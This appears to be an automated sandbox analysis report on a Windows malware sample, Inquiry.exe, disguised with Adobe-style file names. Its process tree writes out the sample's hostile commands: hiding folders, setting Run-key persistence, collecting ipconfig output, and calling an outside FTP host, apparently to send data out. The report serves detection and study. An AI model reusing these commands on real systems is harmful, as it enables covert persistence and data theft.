Analysis
-
max time kernel
2s -
max time network
1s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27-05-2024 19:33
Static task
static1
Behavioral task
behavioral1
Sample
Inquiry.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Inquiry.exe
Resource
win10v2004-20240426-en
General
-
Target
Inquiry.exe
-
Size
2.3MB
-
MD5
7bf8e2064a035d6d6162a5c8f616812c
-
SHA1
402d7116983dd6d79f3eeeb3c3f6ad116ffa5669
-
SHA256
5a1232280d7c0f8298f4d1f33eeaac6ebe4deea654b14367e779a0a7e7ebce8f
-
SHA512
96b235bfcc9651ed50cd7aba365a3bc819434b144ba3eb982a3920db45d5d5d7d53c31e205944f42af9129986b41b57ad128ea5e3d9cc66898a68aebe0805fc8
-
SSDEEP
49152:Iggs8ABpNAcbBicST5ZlL9/5ga/sKvnP+BQzeEbUJJk8Lq1v2BvA78:IVs8AvNzsl12j20EJGqN2mI
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid Process 2144 attrib.exe 1516 attrib.exe 1468 attrib.exe 300 attrib.exe 1528 attrib.exe -
Executes dropped EXE 3 IoCs
Processes:
Adobeta.exeadbr01.exeadbr01.exepid Process 1168 Adobeta.exe 1840 adbr01.exe 2200 adbr01.exe -
Loads dropped DLL 5 IoCs
Processes:
cmd.exeadbr01.exepid Process 2284 cmd.exe 2284 cmd.exe 2284 cmd.exe 2284 cmd.exe 1840 adbr01.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro3.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
xcopy.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid Process 840 ipconfig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
DllHost.exepid Process 2440 DllHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Inquiry.exeWScript.execmd.exeWScript.exedescription pid Process procid_target PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 1896 wrote to memory of 2616 1896 Inquiry.exe 28 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2616 wrote to memory of 2492 2616 WScript.exe 29 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 888 2492 cmd.exe 32 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1516 2492 cmd.exe 33 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 1468 2492 cmd.exe 34 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 300 2492 cmd.exe 35 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 1528 2492 cmd.exe 36 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2144 2492 cmd.exe 37 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2492 wrote to memory of 2676 2492 cmd.exe 38 PID 2676 wrote to memory of 2284 2676 WScript.exe 39 -
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid Process 300 attrib.exe 1528 attrib.exe 2144 attrib.exe 1516 attrib.exe 1468 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"3⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"4⤵
- Enumerates system info in registry
PID:888
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1516
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1468
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:300
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1528
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2144
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"5⤵
- Loads dropped DLL
PID:2284 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s6⤵
- Executes dropped EXE
PID:1168
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro3.bat"6⤵
- Adds Run key to start application
PID:2032
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- Gathers network information
PID:840
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1840 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Executes dropped EXE
PID:2200
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵
- Suspicious use of FindShellTrayWindow
PID:2440
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
118B
MD5c69fb6b170a6abfb965777713ff229c1
SHA1d43a2aa2d68a7a18453ea197a679be7763af859c
SHA256bd703a3de33ffa87e8df571b0365ef6cda20a45b20c8825c2edc2a7a227aeb19
SHA5124a207ac8829e6ba22f4914575c9ce3c0fe7792cd0720bab9717d04008b72c84fb6422ad3106f2f52fa4e3b21a5e697a347ec11558f2b18955e4312002bc8abfe
-
Filesize
124KB
MD51a1075e5e307f3a4b8527110a51ce827
SHA1f453838ed21020b7ca059244feea8579e5aa74ef
SHA256ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1
-
Filesize
560B
MD5481435bcf75055098596cd7eae7a04bd
SHA13089a8aebb1a199d886fddb1a416903a1172d4b3
SHA256261a0c0c76fb08f6b57aaad7fce12c485e00a5ecaac401dc10cb25d225bd8363
SHA512a1174877296c771f13c726576650024bb63d845bb6b6654994cea387d9b4dddff09167e24e596e0d44424997ec422a456c9366ec998b5dcce5d1b5540ee5f7b8
-
Filesize
186B
MD509082253605a7171f078e26dc308a667
SHA1585286c9fcda5e66e7fdb4e17a7bab6160183d46
SHA256f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed
SHA512adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8
-
Filesize
189B
MD5ce8041824149d8266dbb0ad9688224d7
SHA13ab653c43ce66681ceaab90193e1a4c95d998090
SHA2560a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5
SHA512e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d
-
Filesize
256KB
MD597b8dbcc7b3cc290aef4241df911ac2e
SHA1733ababbcd278821d4e3ee78580841981f26642e
SHA256c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023
SHA5124adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25
-
Filesize
140B
MD56f94e6edb06f44229e66f7a3d1ae0966
SHA1997b74fa1beb2791f98177457636d9ce9b30ed4f
SHA2564a4ba15d7a91c61de1cee9d00bd9db6f6d7e63e920dd2833878a46ea57b03f1b
SHA512a2a3d2aa0176e76d46f8a79370ed588ab74b3fb4ca931a6f71e0c34f4561531d62f4da89284ac8cf42ce2e29b18dcc4f7c4d56625e93d2a6e64c082887c6350f
-
Filesize
2.1MB
MD531b2af509754d527a4c2a5cc1b2ad970
SHA1cc737999c1dfeab2dcbe4178118281ff7757db2d
SHA2568d464baad77e60770bacd2d33f7344d08a34a3b3c63a361f9e61f8fec7bef6e9
SHA512a6f1d4daecc61efe555e51a56147a04dfd4dbe4be00a110d4a7cf5f1b3edd17ac5f063a3b3dd9708cde01b8dc04c1526b226186870317746f8899388b6961c8d
-
Filesize
2.1MB
MD5b7884b9cd90c13f6b55c43404d893237
SHA1ccf856935b6c9d248e39b0885c641b803b4c7f1f
SHA2560fdc310a86ecb105cb056774c78f1699fedd764782bf45a011161544f4857ac8
SHA5127dddf3d655a581d57c70c8954308ea1a0a536b04cb1902ea53bc021429b0d81ed36ded4c39c297a17cfd8f33095be581a00f71a23a67c625d0212851d11d1dc1
-
Filesize
1KB
MD5ccf4c9a64c1fbf3818b0ca8f0644de4f
SHA15ff1fd81f9170ed5d3a59487e11cc96560d579bc
SHA256622015abe90dd6b324a4d7b1034165d47f93a5d0572263a9eb067b0e374ee278
SHA51214b2e6877c215f771ecc38028ec94eb4bfe441093e527184be390e1f9829e2c943c80c86d6bd5f605bbbfc2f5cccaf908959a98184982c76dbc1ca4e946df6c0